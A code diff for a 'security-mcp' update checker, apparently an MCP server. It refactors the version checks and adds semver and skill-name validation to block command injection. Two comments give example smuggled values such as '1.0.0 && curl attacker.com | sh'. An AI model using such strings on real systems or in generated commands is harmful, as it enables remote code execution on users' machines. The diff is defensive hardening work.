-    // Check npm for MCP update
-    let latestMcpVersion = null;
+/** Fetch and validate the latest security-mcp version from npm. Returns null on failure. */
+async function fetchLatestMcpVersion() {
     const npmRaw = await httpsGet(NPM_REGISTRY_URL, MAX_NPM_BYTES, 3000);
-    if (npmRaw) {
-        try {
-            latestMcpVersion = JSON.parse(npmRaw).version ?? null;
-        }
-        catch { /* ignore */ }
+    if (!npmRaw)
+        return null;
+    try {
+        const parsed = JSON.parse(npmRaw).version ?? null;
+        // CWE-20: reject malformed version strings — a MitM could return a crafted
+        // version like "1.0.0 && curl attacker.com | sh" to inject shell commands.
+        if (parsed && SEMVER_RE.test(parsed))
+            return parsed;
+        if (parsed)
+            console.warn(`[checkUpdates] Ignoring malformed version string from npm registry: ${JSON.stringify(parsed)}`);
     }
-    // Check skills manifest for skill updates
-    const skillUpdates = [];
-    const versions = readJson(SKILL_VERSIONS_PATH, {});
+    catch { /* ignore parse error */ }
+    return null;
+}
+/** Fetch the skills manifest and return a list of skills that have a newer version. */
+async function fetchSkillUpdates(versions) {
     const manifestRaw = await httpsGet(SKILLS_MANIFEST_URL, MAX_MANIFEST_BYTES, 3000);
-    if (manifestRaw) {
-        try {
-            const manifest = JSON.parse(manifestRaw);
-            for (const [name, entry] of Object.entries(manifest.skills)) {
-                const current = versions[name]?.version;
-                if (current && current !== entry.version) {
-                    skillUpdates.push({ skillName: name, currentVersion: current, latestVersion: entry.version });
-                }
-            }
-        }
-        catch { /* ignore */ }
+    if (!manifestRaw)
+        return [];
+    try {
+        const manifest = JSON.parse(manifestRaw);
+        return Object.entries(manifest.skills).flatMap(([name, entry]) => {
+            const current = versions[name]?.version;
+            return current && current !== entry.version
+                ? [{ skillName: name, currentVersion: current, latestVersion: entry.version }]
+                : [];
+        });
     }
+    catch { /* ignore parse error */ }
+    return [];
+}
+export async function checkUpdates(args) {
+    const { currentMcpVersion } = args;
+    const versions = readJson(SKILL_VERSIONS_PATH, {});
+    const [latestMcpVersion, skillUpdates] = await Promise.all([
+        fetchLatestMcpVersion(),
+        fetchSkillUpdates(versions)
+    ]);
     const hasUpdate = (latestMcpVersion !== null && latestMcpVersion !== currentMcpVersion) ||
         skillUpdates.length > 0;
-    let changelog = "";
+    const changelogParts = [];
     if (latestMcpVersion && latestMcpVersion !== currentMcpVersion) {
-        changelog += `security-mcp: ${currentMcpVersion} → ${latestMcpVersion}\n`;
+        changelogParts.push(`security-mcp: ${currentMcpVersion} → ${latestMcpVersion}`);
     }
     if (skillUpdates.length > 0) {
-        changelog += `Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`;
+        changelogParts.push(`Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`);
     }
-    return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog };
+    return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog: changelogParts.join("\n") };
 }
 // 8. apply_updates (returns instructions for the SKILL.md to surface to user)
 // ---------------------------------------------------------------------------
@@ -544,11 +663,27 @@ export async function applyUpdates(args) {
     const { choice, latestMcpVersion, skillUpdates } = args;
     const commands = [];
     if (latestMcpVersion) {
+        // CWE-20 / TM-004: latestMcpVersion is caller-supplied (not guaranteed to come from
+        // fetchLatestMcpVersion which validates against SEMVER_RE). A compromised npm
+        // registry response or a direct MCP call could inject shell metacharacters into the
+        // command string. Even though applyUpdates only *returns* commands (never execs them),
+        // a crafted string like "1.0.0; curl attacker.com|sh" would be surfaced to the user
+        // for copy-paste execution. Reject non-semver versions defensively.
+        if (!SEMVER_RE.test(latestMcpVersion)) {
+            throw new Error(`applyUpdates: latestMcpVersion "${latestMcpVersion}" is not a valid semver string. ` +
+                `Refusing to generate update commands to prevent command injection.`);
+        }
         commands.push(`npm install -g security-mcp@${latestMcpVersion}`);
         commands.push(`security-mcp install`);
     }
     if (skillUpdates?.length) {
-        commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...skillUpdates.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
+        // CWE-20: validate skillName before interpolating into command strings
+        const safeSkills = skillUpdates.filter((s) => SAFE_SKILL_NAME_RE.test(s.skillName));
+        const rejectedCount = skillUpdates.length - safeSkills.length;
+        if (rejectedCount > 0) {
+            console.warn(`[applyUpdates] Rejected ${rejectedCount} skill(s) with unsafe names.`);
+        }
+        commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...safeSkills.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
     }
     const message = choice === "auto"
         ? `Run the following commands to update:\n${commands.filter((c) => !c.startsWith("#")).join("\n")}`